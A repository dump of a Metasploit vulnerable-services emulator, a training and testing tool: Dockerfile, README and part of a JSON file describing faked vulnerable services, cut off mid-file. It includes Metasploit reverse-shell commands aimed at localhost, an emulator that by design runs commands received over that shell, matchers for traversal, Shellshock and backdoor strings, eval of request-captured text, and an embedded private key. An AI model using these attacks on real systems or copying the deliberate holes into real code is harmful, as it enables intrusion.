├── .dockerignore
├── Dockerfile
├── README.md
├── certs
    ├── server-cert.pem
    └── server-key.pem
├── cortex.yaml
├── secret.txt
├── service.cfg
├── userFuncs.pl
├── userpass.lst
└── vulEmu.pl


/.dockerignore:
--------------------------------------------------------------------------------
1 | .git
2 | .gitignore
3 | 


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian:9.2
 2 | 
 3 | LABEL maintainer "opsxcq@strm.sh"
 4 | 
 5 | RUN apt-get update && \
 6 |     DEBIAN_FRONTEND=noninteractive apt-get install -y \
 7 |     perl \
 8 |     libjson-perl \
 9 |     libio-socket-ssl-perl \
10 |     libtry-tiny-perl \
11 |     libio-compress-perl \
12 |     libclass-std-storable-perl \
13 |     sed \
14 |     && \
15 |     apt-get clean && \
16 |     rm -rf /var/lib/apt/lists/*
17 | 
18 | RUN mkdir /emulator
19 | WORKDIR /emulator
20 | COPY . /emulator/
21 | RUN sed -i 's/127.0.0.1/0.0.0.0/' /emulator/vulEmu.pl
22 | 
23 | # Ports described in service.cfg
24 | EXPOSE 20
25 | EXPOSE 21
26 | EXPOSE 80
27 | EXPOSE 443
28 | EXPOSE 4848
29 | EXPOSE 6000
30 | EXPOSE 6060
31 | EXPOSE 7000
32 | EXPOSE 7181
33 | EXPOSE 7547
34 | EXPOSE 8000
35 | EXPOSE 8008
36 | EXPOSE 8020
37 | EXPOSE 8080
38 | EXPOSE 8400
39 | 
40 | ENTRYPOINT ["perl"]
41 | CMD ["vulEmu.pl"]
42 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Metasploit Vulnerable Services Emulator
  2 | 
  3 |    Many IT professionals and engineers want to learn security because it's such a hot field right now.  There are many free tools 
  4 | out there, one of the most famous is Metasploit.  An obvious route to teach oneself about security is to download Metasploit and
  5 | play with it. However, without vulnerable services to test again, it's hard to play with Metasploit. 
  6 | 
  7 |    The tool is created to emulate vulnerable services for the purpose of 
  8 | * test Metasploit modules.  
  9 | * help with training on Metasploit. 
 10 | 
 11 |    It runs on Linux (Ubuntu), windows platform (hopefully Mac OSX). Currently it supports over 100 emulated vulnerable services,
 12 | we will keep adding more to cover as many of the 1000+ modules in Metasploit as possible. 
 13 | 
 14 | # Key feature
 15 | 
 16 |   To make it easy to add a new emulated service, we have designed it to be language independent: the service emulation is 
 17 | in JSON format, one can add/remove/edit a service in JSON very quickly
 18 | 
 19 |   A minor but interesting feature is that we make it easy to create SSL socket, all TCP sockets can automatically upgrade to SSL. 
 20 | 
 21 | # Quick run
 22 | 
 23 | Note that the commands typed on the shell session spawned are actually executed on the target, so please run this emulator in a safe environment if you don't want it to be owned :-)
 24 | 
 25 | You may have to install the following packages depending on your environment: IO::Socket::SSL Try::Tiny IO::Compress::Gzip Compress::Zlib Storable.
 26 | On my Ubuntu, they can be installed as
 27 | ```
 28 | sudo cpanm install IO::Socket::SSL Try::Tiny IO::Compress::Gzip Compress::Zlib Storable JSON
 29 | ```
 30 | 
 31 | On vulnerability Emulator:
 32 | ```
 33 | perl vulEmu.pl
 34 | >>activate exploits/windows/iis/ms01_023_printer
 35 | 
 36 | ```
 37 | on Metasploit console:
 38 | ```
 39 | msf > use exploit/windows/iis/ms01_023_printer
 40 | msf > set payload windows/shell_reverse_tcp
 41 | msf > setg RHOST 127.0.0.1
 42 | msf > setg LHOST 127.0.0.1
 43 | msf exploit(ms01_023_printer) > run
 44 | 
 45 | [*] Started reverse TCP handler on 127.0.0.1:4444 
 46 | [*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:51852) at 2017-01-20 10:47:12 -0600
 47 | 
 48 | >>ls
 49 | README.md
 50 | secret.txt
 51 | server_cert.pem
 52 | server_key.pem
 53 | service.cfg
 54 | vulEmu.pl
 55 | 
 56 | ```
 57 | 
 58 | # Run it with Docker
 59 | 
 60 | If you want to run the above example in a container environment with docker, just run:
 61 | 
 62 | ```
 63 | docker run --rm -it -p 80:80 vulnerables/metasploit-vulnerability-emulator
 64 | ```
 65 | 
 66 | Then you will be presented to the very same shell, if you don't have docker installed, just follow the instructions [here](https://docker.com).
 67 | 
 68 | Remember, you have to map the port that you want addding a `-p external-port:internal-port` argument. To map all ports present in service.cfg, please run this command:
 69 | 
 70 | ```
 71 | docker run --rm -it \
 72 |        -p 20:20 -p 21:21 -p 80:80 -p 443:443 -p 4848:4848 \
 73 |        -p 6000:6000 -p 6060:6060 -p 7000:7000 -p 7181:7181 \
 74 |        -p 7547:7547 -p 8000:8000 -p 8008:8008 -p 8020:8020 \
 75 |        -p 8080:8080 -p 8400:8400 \
 76 |        vulnerables/metasploit-vulnerability-emulator
 77 | ```
 78 | 
 79 | # Developer overview
 80 | 
 81 | 
 82 | The software has two parts
 83 | 
 84 | * Server/service emulation description file in JSON  (service.cfg)
 85 | * Interpreter (currently implemented in perl, but it can be done with other languages too)
 86 | 
 87 | Here is a quick example from part of the service emulation description file, for the Metasploit module exploit/multi/http/tomcat_mgr_deploy.
 88 | 
 89 | 
 90 | ```
 91 | 	"exploit/multi/http/tomcat_mgr_deploy" : {
 92 | 		"defaultPort": [80],
 93 | 		"seq": [
 94 | 			["substr", "GET \/manager\/serverinfo"],
 95 | 			["HTTP/1.0 200 OK\r\nContent-Length: $\r\n\r\n", "!!OS Name: Linux\nOS Architecture: x86_64"],
 96 | 			["starts", "PUT /manager/deploy?path="],
 97 | 			["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", {
 98 | 				"connect": "127.0.0.1:4444"
 99 | 			}]
100 | 		]
101 | 	},
102 | ```
103 | 
104 |  The most important part is the "seq" array. it always has even number of entries.  When a message is received, it's compared
105 | to the entries 0, 2, 4 ... Once a match is found, it will execute the entry immediately after it.  For example, if an entry
106 | matches with entry 2, it will execute the statements in entry 3. 
107 | 
108 |  The matching entries have the matching actions such as
109 | 
110 | * **substr**:  do a substring match
111 | * **regex**:   do a regular expression match
112 | * **starts**:  check if incoming message starts with the string in the entry
113 | 
114 |   The execution entry itself can have multiple entries. Each entry can be just a string, an array or dictionary. strings and arrays
115 | are used to build the response message (by concatentation).  For an array, it has a few elements, the first element is action type,
116 | such as
117 | 
118 | * **repeat**:  return a string after repeating the string (second element) by the certain number of times specified by the third element.
119 | * **nsize**:   return the size of the element
120 | * **gzip**:    return the gzipped content
121 |    
122 |    It can also do compacting of string into binary data, such as  ["N", 123] which will compact the number 123 into big-endean 
123 | 4-byte integer.
124 | 


--------------------------------------------------------------------------------
/certs/server-cert.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN CERTIFICATE-----
 2 | MIICxjCCAi+gAwIBAgIJAJWvuplHNQEOMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNV
 3 | BAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEPMA0GA1UEBwwGQXVzdGluMRQwEgYDVQQK
 4 | DAtFbmdpbmVlcmluZzEMMAoGA1UECwwDTVNGMSgwJgYDVQQDDB9wZXJmdGVzdC5l
 5 | bmdpbmVlcmluZy5yYXBpZDcuY29tMB4XDTE2MTEyMjE3NTQwN1oXDTI2MTEyMDE3
 6 | NTQwN1owfDELMAkGA1UEBhMCVVMxDjAMBgNVBAgMBVRleGFzMQ8wDQYDVQQHDAZB
 7 | dXN0aW4xFDASBgNVBAoMC0VuZ2luZWVyaW5nMQwwCgYDVQQLDANNU0YxKDAmBgNV
 8 | BAMMH3BlcmZ0ZXN0LmVuZ2luZWVyaW5nLnJhcGlkNy5jb20wgZ8wDQYJKoZIhvcN
 9 | AQEBBQADgY0AMIGJAoGBAMlBPzitYRxOIsH7IiYHXNHNki5AJa8vgNAydZLb57bQ
10 | wxas8O+YCg+0diyeO5o5Y4uavrY7OarGvJ+Ne7IrVQMgSOvC46Lzo5jNKfl069lm
11 | mdTYTsT3TPEXQfzODbxirOtyFu3thVqnWfu8UKG1PZsfUgl0SDlk6RMVtQfH5ZBl
12 | AgMBAAGjUDBOMB0GA1UdDgQWBBS85+SIfwr2u8CRzAWyTVfiiFXfwzAfBgNVHSME
13 | GDAWgBS85+SIfwr2u8CRzAWyTVfiiFXfwzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3
14 | DQEBCwUAA4GBAAj9GsVOr65N+Q2kH8ljfnPte/nscHhkXMcjSANEbsFhu3AgoVsJ
15 | uZKb3eTRqcDy9w2m3f5xFNIU0cxS4lXxBWQ0lJMygiH5UJC7gQjVYxhjr4/4Pn2S
16 | mMgAgOKhst+os+iU5m/uwTA+v2o5RrCUBCuOzdJjK3X/dIi3Byt7h8qx
17 | -----END CERTIFICATE-----
18 | 


--------------------------------------------------------------------------------
/certs/server-key.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN RSA PRIVATE KEY-----
 2 | MIICXAIBAAKBgQDJQT84rWEcTiLB+yImB1zRzZIuQCWvL4DQMnWS2+e20MMWrPDv
 3 | mAoPtHYsnjuaOWOLmr62OzmqxryfjXuyK1UDIEjrwuOi86OYzSn5dOvZZpnU2E7E
 4 | 90zxF0H8zg28Yqzrchbt7YVap1n7vFChtT2bH1IJdEg5ZOkTFbUHx+WQZQIDAQAB
 5 | AoGBAMiPlFCIQDG0EGFeQw7A4ZhXlCkxVhy6a1WQI6liKw3+B50uZcFvs/8oqWgX
 6 | nHA6ZuC2Kv5yESsGeO1MUwwgsMrzRq6xGh77yVWw323RZ+z2qri0Lf8Unl13MCz/
 7 | CGCyXxiEDDjPybf40G/8KIBjJCivHBlqV2OdaVoBuUKRBeX1AkEA5r7GcCLZbkAH
 8 | l6KQWzFt5DecvML4B3rvPhpZJY0sFFpDZHYFZ0Mch3fG27wNG/KTM//H6dhNGQG6
 9 | Gwc1U05T7wJBAN9IL2HPNRwKqJbe2EGWtcELm50Z96C6C7RDkwas9ZiZJR5n6pMM
10 | 9IerA5GluB3eAUU1ebhffeYS4dLgksVVvOsCQHsOjPeqrjiM7z+gE8p+jvOh8PX+
11 | KJacqlB9bsOHCVYFWWGPS4xpjyJz71qqbHdWI8kchPoiP+OxNxZI/thhsoMCQGR2
12 | 5lrsEMl9Qj4gJs3cMguaXXpipLj8/ScvAIiQajEvNzRnLXTc72nb2M8/8Yf+zDOH
13 | zCzZSpyrAlEQGvoPieECQAK/LrtRta8FJhGexa4J7kwUgn3PZOLwBuowO42ZGzUp
14 | Zcq7FKW+IxR3+hbbtrq8TtxK2yNEa769SqepDvxuNxc=
15 | -----END RSA PRIVATE KEY-----
16 | 


--------------------------------------------------------------------------------
/cortex.yaml:
--------------------------------------------------------------------------------
 1 | ---
 2 | info:
 3 |   title: Metasploit Vulnerability Emulator
 4 |   description: Created by Jin Qian via the GitHub Connector
 5 |   x-cortex-git:
 6 |     github:
 7 |       alias: r7org
 8 |       repository: rapid7/metasploit-vulnerability-emulator
 9 |   x-cortex-tag: metasploit-vulnerability-emulator
10 |   x-cortex-type: service
11 |   x-cortex-domain-parents:
12 |   - tag: metasploit
13 | openapi: 3.0.1
14 | servers:
15 | - url: "/"
16 | 


--------------------------------------------------------------------------------
/secret.txt:
--------------------------------------------------------------------------------
1 | hello yall!
2 | 


--------------------------------------------------------------------------------
/service.cfg:
--------------------------------------------------------------------------------
   1 | {
   2 | 	"auxiliary/scanner/ftp/anonymous": {
   3 | 		"initMsg": ["220 Welcome to ftp server\r\n"],
   4 | 		"defaultPort": [21, 20],
   5 | 		"seq": [
   6 | 			["starts", "USER "],
   7 | 			["331 Need password\r\n"],
   8 | 			["starts", "PASS "],
   9 | 			["200 Logged in\r\n"],
  10 | 			["starts", "PASV"],
  11 | 			["227 Entering Passive Mode (127,0,0,1,0,20)\r\n"],
  12 | 			["regex", "^(LIST|STOR|RETR)"],
  13 | 			["150 Ready\r\n", ["action", ["sendFile", "secret.txt"], ["send", "200 transfer completed\r\n"]]],
  14 | 			["any"],
  15 | 			["200 Success!\r\n"]
  16 | 		]
  17 | 	},
  18 | 	"auxiliary/scanner/ftp/konica_ftp_traversal": {
  19 | 		"follow": "auxiliary/scanner/ftp/anonymous",
  20 | 		"defaultPort": [21, 20]
  21 | 	},
  22 | 	"auxiliary/scanner/ftp/pcman_ftp_traversal": {
  23 | 		"follow": "auxiliary/scanner/ftp/anonymous",
  24 | 		"defaultPort": [21, 20]
  25 | 	},
  26 | 	"auxiliary/scanner/ftp/titanftp_xcrc_traversal": {
  27 | 		"follow": "auxiliary/scanner/ftp/anonymous",
  28 | 		"initMsg": ["220 Welcome to titan ftp server\n"],
  29 | 		"defaultPort": [21, 20],
  30 | 		"seq": [
  31 | 			["regex", "XCRC .*9999999999"],
  32 | 			["501 Syntax error in parameters or arguments. EndPos of 9999999999 is larger than file size 20.\r\n"],
  33 | 			["regex", "XCRC .* (\\d+)\\r\\n"],
  34 | 			["250 ", ["crc32", "hello world you all!!\n"], "\r\n"]
  35 | 		]
  36 | 	},
  37 | 	"exploits/windows/iis/ms01_023_printer": {
  38 | 		"desc": "",
  39 | 		"extraCmds": "set payload windows/shell_reverse_tcp\r\nsetg LHOST 127.0.0.1",
  40 | 		"defaultPort": [80],
  41 | 		"seq": [
  42 | 			["regex", "GET http:\/\/.*\/NULL.printer?"],
  43 | 			["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]
  44 | 
  45 | 		]
  46 | 	},
  47 | 	"auxiliary/scanner/http/a10networks_ax_directory_traversal": {
  48 | 		"defaultPort": [80],
  49 | 		"extraCmds": "set CONFIRM_DELETE true",
  50 | 		"seq": [
  51 | 			["starts", "GET /xml/downloads/?filename="],
  52 | 			["HTTP/1.1 200 OK\r\nContent-Length: 11\r\n\r\nmy secrete\n"]
  53 | 		]
  54 | 	},
  55 | 	"auxiliary/scanner/http/adobe_xml_inject": {
  56 | 		"defaultPort": [8400],
  57 | 		"seq": [
  58 | 			["starts", "POST /flex2gateway/"],
  59 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"],
  60 | 			["any"],
  61 | 			["HTTP/1.1 200 OK\r\nContent-Length: 15\r\n\r\nUnknown systax\n"]
  62 | 		]
  63 | 	},
  64 | 	"auxiliary/scanner/http/allegro_rompager_misfortune_cookie": {
  65 | 		"defaultPort": [80],
  66 | 		"seq": [
  67 | 			["regex", "Cookie:\\s*(\\S+)"],
  68 | 			["HTTP/1.1 404 Not Found\r\nSet-Cookie: SID=1234567;\r\nContent-Length: $\r\n\r\n", ["eval", "$1"]],
  69 | 			["starts", "GET "],
  70 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"]
  71 | 		]
  72 | 	},
  73 | 	"auxiliary/scanner/http/apache_mod_cgi_bash_env": {
  74 | 		"defaultPort": [80],
  75 | 		"extraCmds": "set TARGETURI /",
  76 | 		"seq": [
  77 | 			["regex", "User-Agent: \\(\\).*echo.*\\)(.*?)\""],
  78 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["eval", "$1$1$1"]]
  79 | 		]
  80 | 	},
  81 | 	"auxiliary/scanner/http/apache_userdir_enum": {
  82 | 		"defaultPort": [80],
  83 | 		"seq": [
  84 | 			["starts", "GET /~admin"],
  85 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
  86 | 			["any"],
  87 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 10\r\n\r\nTry again!!"]
  88 | 		]
  89 | 	},
  90 | 	"auxiliary/scanner/http/bitweaver_overlay_type_traversal": {
  91 | 		"desc": "TODO: need to have a good content in loot",
  92 | 		"defaultPort": [80],
  93 | 		"seq": [
  94 | 			["starts", "GET /bitweaver/gmap/view_overlay.php?overlay_type=../../../../../../../../../../etc/passwd"],
  95 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "Notice:\r\nadmin:pass123\njdole:letmein\n"]
  96 | 		]
  97 | 	},
  98 | 	"auxiliary/scanner/http/bmc_trackit_passwd_reset": {
  99 | 		"defaultPort": [80],
 100 | 		"seq": [
 101 | 			["starts", "GET /PasswordReset"],
 102 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "<title>Track-It! Password Reset Build=11.3"],
 103 | 			["substr", "updatequesChk="],
 104 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "{\"success\":true,\"data\":{\"userUpdated\":true}}" ],
 105 | 			["substr", "newPassword="],
 106 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "{\"success\":true,\"data\":{\"PasswordResetStatus\":0}}"]
 107 | 		]
 108 | 	},
 109 | 	"auxiliary/scanner/http/brute_dirs": {
 110 | 		"defaultPort": [80],
 111 | 		"seq": [
 112 | 			["regex", "GET \\/[^\\s]{5,5}\\/ "],
 113 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 12\r\n\r\ngina de error"],
 114 | 			["starts", "GET /ab/"],
 115 | 			["HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\ngina de error"],
 116 | 			["any"],
 117 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 16\r\n\r\nit's unavailable"]
 118 | 		]
 119 | 	},
 120 | 	"auxiliary/scanner/http/canon_wireless": {
 121 | 		"defaultPort": [80],
 122 | 		"seq": [
 123 | 			["any"],
 124 | 			["HTTP/1.1 200 OK\r\nContent-Length: 85\r\n\r\n", "<html><body><input name=\"LAN_OPT1\" checked=\"true\" value=\"1\">222</input></body></html>"]
 125 | 		]
 126 | 	},
 127 | 	"auxiliary/scanner/http/caidao_bruteforce_login": {
 128 | 		"defaultPort": [80],
 129 | 		"seq": [
 130 | 			["split", "\\\""],
 131 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["eval", "$results[3]$results[1]$results[5]"]]
 132 | 		]
 133 | 	},
 134 | 	"auxiliary/scanner/http/cisco_device_manager": {
 135 | 		"defaultPort": [80],
 136 | 		"seq": [
 137 | 			["starts", "GET /exec/show/version/CR"],
 138 | 			["HTTP/1.1 200 OK\r\nContent-Length: 44\r\n\r\nCisco Internetwork Operating System Software"],
 139 | 			["starts", "GET /exec/show/config/CR"],
 140 | 			["HTTP/1.1 200 OK\r\nContent-Length: 45\r\n\r\n<FORM METHOD=\"POST\">enable password 0 ABCDEF01</FORM>"]
 141 | 		]
 142 | 	},
 143 | 	"auxiliary/scanner/http/cisco_ios_auth_bypass": {
 144 | 		"defaultPort": [80],
 145 | 		"seq": [
 146 | 			["regex", "GET .*version\/CR"],
 147 | 			["HTTP/1.1 200 OK\r\nContent-Length: 44\r\n\r\nCisco Internetwork Operating System Software"],
 148 | 			["regex", "GET .*config/CR"],
 149 | 			["HTTP/1.1 200 OK\r\nContent-Length: 45\r\n\r\n<FORM METHOD=\"POST\">some fields here!!</FORM>"]
 150 | 		]
 151 | 	},
 152 | 	"auxiliary/scanner/http/concrete5_member_list": {
 153 | 		"defaultPort": [80],
 154 | 		"seq": [
 155 | 			["starts", "GET /index.php/members"],
 156 | 			["HTTP/1.1 200 OK\r\nContent-Length: 176\r\n\r\n<div class=\"ccm-profile-member-username\">/view/123/<a href=\"profiles/123\">john</a></div><div class=\"ccm-profile-member-username\">/view/345/<a href=\"profiles/345\">mary</a></div>"]
 157 | 		]
 158 | 	},
 159 | 	"auxiliary/scanner/http/copy_of_file": {
 160 | 		"defaultPort": [80],
 161 | 		"seq": [
 162 | 			["any"],
 163 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 164 | 		]
 165 | 	},
 166 | 	"auxiliary/scanner/http/clansphere_traversal": {
 167 | 		"defaultPort": [80],
 168 | 		"seq": [
 169 | 			["any"],
 170 | 			["HTTP/1.1 200 OK\r\nContent-Length: 112\r\n\r\n<div id=\"bottom\">\n<div id=\"bottom\">\nall my secret1 here\n     UTC  <div id=\"bottom\">\nall my secret2 here\n     UTC"]
 171 | 		]
 172 | 	},
 173 | 	"auxiliary/scanner/http/coldfusion_version": {
 174 | 		"defaultPort": [80],
 175 | 		"seq": [
 176 | 			["any"],
 177 | 			["HTTP/1.1 200 OK\r\nServer: IIS 10.8\r\nContent-Length: 172\r\n\r\n<title>ColdFusionAdministrator</title><strong>Version:6.9</strong><br />", ["repeat", " ", 100]]
 178 | 		]
 179 | 	},
 180 | 	"auxiliary/scanner/http/coldfusion_locale_traversal": {
 181 | 		"defaultPort": [80],
 182 | 		"seq": [
 183 | 			["any"],
 184 | 			["HTTP/1.1 200 OK\r\nServer: IIS 10.8\r\nContent-Length: 170\r\n\r\n<title>ColdFusionAdministrator</title><strong>Version:9</strong><br />", ["repeat", " ", 100]]
 185 | 		]
 186 | 	},
 187 | 	"auxiliary/scanner/http/dir_webdav_unicode_bypass": {
 188 | 		"defaultPort": [80],
 189 | 		"seq": [
 190 | 			["regex", "PROPFIND /.+~tracking/"],
 191 | 			["HTTP/1.1 207 OK\r\nContent-Length: 12\r\n\r\nhere you are"],
 192 | 			["starts", "PROPFIND /~"],
 193 | 			["HTTP/1.1 401 Not Authorized\r\nContent-Length: 8\r\n\r\nGot it!!"],
 194 | 			["any"],
 195 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 196 | 		]
 197 | 	},
 198 | 	"auxiliary/scanner/http/dlink_dir_300_615_http_login": {
 199 | 		"defaultPort": [80],
 200 | 		"seq": [
 201 | 			["substr", "LOGIN_USER=admin&LOGIN_PASSWD=admin"],
 202 | 			["HTTP/1.1 200 OK\r\nContent-Length: 52\r\n\r\n<META HTTP-EQUIV=Refresh CONTENT='0; url=index.php'>"],
 203 | 			["starts", "POST "],
 204 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 205 | 			["any"],
 206 | 			["HTTP/1.1 200 OK\r\nServer: Mathopd/1.5p6\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 207 | 		]
 208 | 	},
 209 | 	"auxiliary/scanner/http/dlink_dir_615h_http_login": {
 210 | 		"defaultPort": [80],
 211 | 		"seq": [
 212 | 			["substr", "sel_userid=admin&userid=&passwd=password"],
 213 | 			["HTTP/1.1 200 OK\r\nContent-Length: 61\r\n\r\n<script langauge=\"javascript\">showMainTabs(\"setup\");</script>"],
 214 | 			["starts", "POST /"],
 215 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nfailed!!!!"],
 216 | 			["starts", "GET /gconfig.htm"],
 217 | 			["HTTP/1.1 200 OK\r\nServer: Mathopd/1.5p6\r\nContent-Length: 28\r\n\r\nvar systemName='DLINK-DIR615"]
 218 | 		]
 219 | 	},
 220 | 	"auxiliary/scanner/http/dlink_dir_session_cgi_http_login": {
 221 | 		"defaultPort": [80],
 222 | 		"seq": [
 223 | 			["substr", "USER=admin&PASSWD=password"],
 224 | 			["HTTP/1.1 200 OK\r\nContent-Length: 24\r\n\r\n<RESULT>SUCCESS</RESULT>"],
 225 | 			["starts", "POST "],
 226 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 10\r\n\r\nfailed!!!!"],
 227 | 			["starts", "GET /session.cgi"],
 228 | 			["HTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-111 Ver 2.9\r\nContent-Length: 28\r\n\r\nvar systemName='DLINK-DIR615"]
 229 | 		]
 230 | 	},
 231 | 	"auxiliary/scanner/http/dlink_user_agent_backdoor": {
 232 | 		"defaultPort": [80],
 233 | 		"seq": [
 234 | 			["substr", "xmlset_roodkcableoj28840ybtide"],
 235 | 			["HTTP/1.1 200 OK\r\nServer: alpha\r\nContent-Length: 21\r\n\r\nHome/bsc_internet.htm"],
 236 | 			["starts", "GET /"],
 237 | 			["HTTP/1.1 200 OK\r\nServer: alpha\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 238 | 		]
 239 | 	},
 240 | 	"auxiliary/scanner/http/dolibarr_login": {
 241 | 		"defaultPort": [80],
 242 | 		"seq": [
 243 | 			["starts", "POST /"],
 244 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 245 | 			["substr", "username=connect&password=letmein"],
 246 | 			["HTTP/1.1 301 Moved\r\nLocation: /retry/admin\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 247 | 			["starts", "GET /"],
 248 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: DOLSESSID_G=1234;\r\nContent-Length: 41\r\n\r\ntype=\"hidden\" name=\"token\" value=\"567789\""]
 249 | 		]
 250 | 	},
 251 | 	"auxiliary/scanner/http/drupal_views_user_enum": {
 252 | 		"defaultPort": [80],
 253 | 		"seq": [
 254 | 			["starts", "GET /?q=admin/views/ajax/autocomplete/user/b "],
 255 | 			["HTTP/1.1 200 OK\r\nContent-Length: 28\r\n\r\n[\"tblack\", \"jbarry\",\"mBoys\"]"],
 256 | 			["starts", "GET /?q=admin/views/ajax/autocomplete/user"],
 257 | 			["HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\n[  ]"]
 258 | 		]
 259 | 	},
 260 | 	"auxiliary/scanner/http/error_sql_injection": {
 261 | 		"defaultPort": [80],
 262 | 		"extraCmds": "set QUERY q=123",
 263 | 		"seq": [
 264 | 			["substr", "'& HTTP/1.1\r\n"],
 265 | 			["HTTP/1.1 200 OK\r\nContent-Length: 50\r\n\r\nUnclosed quotation mark after the character string"],
 266 | 			["any"],
 267 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 268 | 		]
 269 | 	},
 270 | 	"auxiliary/scanner/http/etherpad_duo_login": {
 271 | 		"defaultPort": [80],
 272 | 		"seq": [
 273 | 			["substr", "Authorization: Basic cm9vdDpwYXNzd29yZA=="],
 274 | 			["HTTP/1.1 200 OK\r\nServer: EtherPAD\r\nContent-Length: 9\r\n\r\nHome Page"],
 275 | 			["substr", "Authorization: Basic"],
 276 | 			["HTTP/1.1 401 Authentication Needed\r\nServer: EtherPAD\r\nContent-Length: 12\r\n\r\nEtherPAD Duo"],
 277 | 			["any"],
 278 | 			["HTTP/1.1 200 OK\r\nServer: EtherPAD\r\nContent-Length: 12\r\n\r\nEtherPAD Duo"]
 279 | 		]
 280 | 	},
 281 | 	"auxiliary/scanner/http/drupal_views_user_enum": {
 282 | 		"defaultPort": [80],
 283 | 		"seq": [
 284 | 			["starts", "GET /?q=admin/views/ajax/autocomplete/user/b "],
 285 | 			["HTTP/1.1 200 OK\r\nContent-Length: 16\r\n\r\n[\"bob\", \"barry\"]"],
 286 | 			["starts", "GET /?q=admin/views/ajax/autocomplete/user/j "],
 287 | 			["HTTP/1.1 200 OK\r\nContent-Length: 15\r\n\r\n[\"john\", \"joe\"]"],
 288 | 			["starts", "GET /?q=admin/views/ajax/autocomplete/user/"],
 289 | 			["HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\n[  ]"]
 290 | 		]
 291 | 	},
 292 | 	"auxiliary/scanner/http/ektron_cms400net": {
 293 | 		"defaultPort": [80],
 294 | 		"seq": [
 295 | 			["substr", "username=Admin2&password=Admin2"],
 296 | 			["HTTP/1.1 200 OK\r\nContent-Length: 18\r\n\r\nLoginSuceededPanel"],
 297 | 			["any"],
 298 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 299 | 		]
 300 | 	},
 301 | 	"auxiliary/scanner/http/enum_wayback": {
 302 | 		"defaultPort": [80],
 303 | 		"seq": [
 304 | 			["any"],
 305 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 306 | 		]
 307 | 	},
 308 | 	"auxiliary/scanner/http/f5_bigip_virtual_server": {
 309 | 		"defaultPort": [80],
 310 | 		"seq": [
 311 | 			["any"],
 312 | 			["HTTP/1.1 200 OK\r\nServer: BigIP\r\nContent-Length: 21\r\n\r\n<title>BIG-IP</title>"]
 313 | 		]	
 314 | 	},
 315 | 	"auxiliary/scanner/http/frontpage_login": {
 316 | 		"defaultPort": [80],
 317 | 		"seq": [
 318 | 			["any"],
 319 | 			["HTTP/1.1 200 OK\r\nServer: frontSrv 2.3\r\nContent-Length: 43\r\n\r\nFPVersion=\"2.3\" FPAuthorScriptUrl=/tryagain"]
 320 | 		]
 321 | 	},
 322 | 	"auxiliary/scanner/http/gitlab_login": {
 323 | 		"defaultPort": [80],
 324 | 		"seq": [
 325 | 			["starts", "POST "],
 326 | 			["HTTP/1.1 302 Moved\r\nSet-Cookie: _gitlab_session=1234567;\r\nContent-Length: 41\r\n\r\n{\"username\": \"john\", \"name\": \"John Dole\"}"],
 327 | 			["any"],
 328 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: _gitlab_session=1234567;\r\nContent-Length: 79\r\n\r\nuser[login]  <input name=\"authenticity_token\" type=\"hidden\" value=\"abcdef1234\">"]
 329 | 		]
 330 | 	},
 331 | 	"auxiliary/scanner/http/gitlab_user_enum": {
 332 | 		"defaultPort": [80],
 333 | 		"seq": [
 334 | 			["starts", "GET /api/v3/internal/discover?key_id=4 "],
 335 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: _gitlab_session=1234567;\r\nContent-Length: 41\r\n\r\n{\"username\": \"john\", \"name\": \"John Dole\"}"],
 336 | 			["any"],
 337 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: _gitlab_session=1234567;\r\nContent-Length: 47\r\n\r\n{\"gitlab_version\": \"12.3\", \"gitlab_rev\": \"223\"}"]
 338 | 		]
 339 | 	},
 340 | 	"auxiliary/scanner/http/buffalo_login": {
 341 | 		"defaultPort": [80],
 342 | 		"seq": [
 343 | 			["substr", "Login&user=root&password=password"],
 344 | 			["HTTP/1.1 200 OK\r\nContent-Length: 17\r\n\r\n{\"success\": true}"],
 345 | 			["any"],
